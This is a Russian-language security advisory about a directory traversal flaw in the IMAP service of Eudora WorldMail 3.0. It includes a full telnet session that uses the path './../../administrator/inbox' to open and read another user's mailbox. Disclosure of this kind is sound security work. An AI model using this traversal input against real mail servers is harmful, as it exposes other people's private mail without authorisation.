Обход каталога в службе IMAP в Eudora WorldMail

Дата публикации:	25.11.2005
Всего просмотров:	2440
Опасность:	Средняя
Наличие исправления:
Количество уязвимостей:	1
CVE ID:	Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:	Нет данных
Наличие эксплоита:	Нет данных
Уязвимые продукты:
	Уязвимые версии: Eudora WorldMail 3.0, возможно более ранние версии Описание: Уязвимость позволяет удаленному пользователю получить доступ к потенциально важным данным на системе. Уязвимость существует в службе IMAP при обработке различных команд. Удаленный пользователь может просматривать и удалять письма других пользователей, а также переносить каталоги. Пример: ----------------------------------- c:\> telnet 192.168.0.109 143 * OK WorldMail IMAP4 Server 6.1.19.0 ready 1 login user1 user1 1 OK LOGIN completed 2 select /inbox * 0 EXISTS * OK [UNSEEN 0] 2 OK [READ-WRITE] opened /inbox 2 select ./../../administrator/inbox * 1 EXISTS * OK [UNSEEN 1] Message 1 is first unseen 2 OK [READ-WRITE] opened ./../../administrator/inbox 2 fetch 1 (RFC822.TEXT) * 1 FETCH (RFC822.TEXT {131} this message was sent to administrator ------------------------------------ URL производителя: www.eudora.com/worldmail/ Решение: Способов устранения уязвимости не существует в настоящее время. Источник:
Ссылки:	Qualcomm WorldMail IMAP Server Directory Traversal Vulnerability

Обход каталога в службе IMAP в Eudora WorldMail

Подпишитесь на email рассылку